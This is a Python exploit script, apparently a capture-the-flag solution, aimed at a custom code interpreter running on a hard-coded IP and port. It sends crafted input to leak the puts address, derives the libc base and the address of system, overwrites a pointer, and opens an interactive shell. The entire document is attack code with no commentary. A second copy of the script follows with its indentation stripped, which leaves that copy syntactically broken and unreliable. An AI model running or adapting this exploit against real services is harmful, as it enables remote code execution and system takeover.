ymgve/fu-interpreter-exploit.py

## fu-interpreter-exploit.py
import socket, struct, os, binascii, base64
import telnetlib

def readline(sc, show = True):
    res = ""
    while len(res) == 0 or res[-1] != "\n":
        data = sc.recv(1)
        if len(data) == 0:
            print repr(res)
            raise Exception("Server disconnected")
        res += data

    if show:
        print repr(res[:-1])
    return res[:-1]

def read_until(sc, s):
    res = ""
    while not res.endswith(s):
        data = sc.recv(1)
        if len(data) == 0:
            print repr(res)
            raise Exception("Server disconnected")
        res += data

    return res[:-(len(s))]

def read_all(sc, n):
    data = ""
    while len(data) < n:
        block = sc.recv(n - len(data))
        if len(block) == 0:
            print repr(data)
            raise Exception("Server disconnected")
        data += block

    return data

def I(n):
    return struct.pack("<I", n)

def Q(n):
    return struct.pack("<Q", n)


sc = socket.create_connection(("69.90.132.40", 4001))

code = ":(" + ":<" * 32 + ":." + ":::>" * 4 + ":<:." * 4
print len(code)

read_until(sc, "Enter your code:")

sc.send(code + "\n")
sc.send("\x1c")

read_until(sc, "Not implemented yet!\n")

puts_addr = struct.unpack("<I", read_all(sc, 4))[0]
print hex(puts_addr)

libc_addr = puts_addr - 0x0005F140
print hex(libc_addr)
system_addr = libc_addr + 0x0005F058

sc.send(struct.pack("<I", system_addr)[::-1])

print "interactive"

t = telnetlib.Telnet()
t.sock = sc
t.interact()

while True:
    data = sc.recv(16384)
    if len(data) == 0:
        break
    for line in data.split("\n"):
        print repr(line)
	import socket, struct, os, binascii, base64
	import telnetlib

	def readline(sc, show = True):
	res = ""
	while len(res) == 0 or res[-1] != "\n":
	data = sc.recv(1)
	if len(data) == 0:
	print repr(res)
	raise Exception("Server disconnected")
	res += data

	if show:
	print repr(res[:-1])
	return res[:-1]

	def read_until(sc, s):
	res = ""
	while not res.endswith(s):
	data = sc.recv(1)
	if len(data) == 0:
	print repr(res)
	raise Exception("Server disconnected")
	res += data

	return res[:-(len(s))]

	def read_all(sc, n):
	data = ""
	while len(data) < n:
	block = sc.recv(n - len(data))
	if len(block) == 0:
	print repr(data)
	raise Exception("Server disconnected")
	data += block

	return data

	def I(n):
	return struct.pack("<I", n)

	def Q(n):
	return struct.pack("<Q", n)


	sc = socket.create_connection(("69.90.132.40", 4001))

	code = ":(" + ":<" * 32 + ":." + ":::>" * 4 + ":<:." * 4
	print len(code)

	read_until(sc, "Enter your code:")

	sc.send(code + "\n")
	sc.send("\x1c")

	read_until(sc, "Not implemented yet!\n")

	puts_addr = struct.unpack("<I", read_all(sc, 4))[0]
	print hex(puts_addr)

	libc_addr = puts_addr - 0x0005F140
	print hex(libc_addr)
	system_addr = libc_addr + 0x0005F058

	sc.send(struct.pack("<I", system_addr)[::-1])

	print "interactive"

	t = telnetlib.Telnet()
	t.sock = sc
	t.interact()

	while True:
	data = sc.recv(16384)
	if len(data) == 0:
	break
	for line in data.split("\n"):
	print repr(line)